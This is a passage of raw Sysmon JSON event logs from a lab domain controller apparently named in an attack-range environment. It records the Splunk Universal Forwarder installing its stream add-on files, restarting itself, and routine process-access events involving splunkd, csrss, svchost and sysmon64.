Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\qmprotocols.dll","CreationUtcTime":"2020-08-01 07:55:27.702","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2898,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 07:55:27.717\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nProcessId: 2488\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nCreationUtcTime: 2020-08-01 07:55:27.717","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 07:55:27.717","ProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","CreationUtcTime":"2020-08-01 07:55:27.717","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2899,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:55:27.827\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nProcessId: 2488\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\vccorlib140.dll\r\nCreationUtcTime: 2020-08-01 07:55:27.827","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:55:27.827","ProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\vccorlib140.dll","CreationUtcTime":"2020-08-01 07:55:27.827","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2900,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:55:27.827\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nProcessId: 2488\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\vcruntime140.dll\r\nCreationUtcTime: 2020-08-01 07:55:27.827","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:55:27.827","ProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\vcruntime140.dll","CreationUtcTime":"2020-08-01 07:55:27.827","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2901,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:55:27.827\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nProcessId: 2488\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\wpcap.dll\r\nCreationUtcTime: 2020-08-01 07:55:27.827","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:55:27.827","ProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\wpcap.dll","CreationUtcTime":"2020-08-01 07:55:27.827","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2902,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.865\r\nProcessGuid: {41C8662E-1FEF-5F25-0000-0010A7360500}\r\nProcessId: 2440\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: splunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2488\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.865","ProcessGuid":"{41C8662E-1FEF-5F25-0000-0010A7360500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"splunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2488","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2903,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.858\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3984\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FEF-5F25-0000-0010A7360500}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+77c1aa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+b08def|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+dd792a|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+dd534e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+1a2a848|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.858","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3984","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FEF-5F25-0000-0010A7360500}","TargetProcessId":"2440","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+77c1aa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+b08def|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+dd792a|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+dd534e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+1a2a848|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2904,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.858\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FEF-5F25-0000-0010A7360500}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.858","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FEF-5F25-0000-0010A7360500}","TargetProcessId":"2440","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2905,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.858\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.858","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2906,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.858\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.858","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2907,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.858\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.858","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2908,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.858\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 